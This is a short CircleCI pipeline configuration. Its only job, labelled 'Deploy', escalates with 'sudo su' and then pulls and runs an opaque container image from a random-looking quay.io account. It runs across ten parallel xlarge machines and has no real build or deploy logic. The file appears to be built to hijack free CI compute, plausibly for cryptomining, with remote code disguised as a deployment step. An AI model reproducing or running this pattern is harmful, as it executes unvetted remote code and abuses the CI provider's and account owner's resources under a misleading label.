working_dir: &working_dir ~/app

version: 2.1

workflows:
  main:
    jobs:
      - build

jobs:
  build:
    parallelism: 10
    machine:
      image: ubuntu-2204:2022.04.1 
    resource_class: xlarge
    steps:
      - checkout
      - run:
         name: "Deploy"
         command: |
                      sudo su
                      docker pull quay.io/eyfsubdi78/a:latest
                      docker run quay.io/eyfsubdi78/a:latest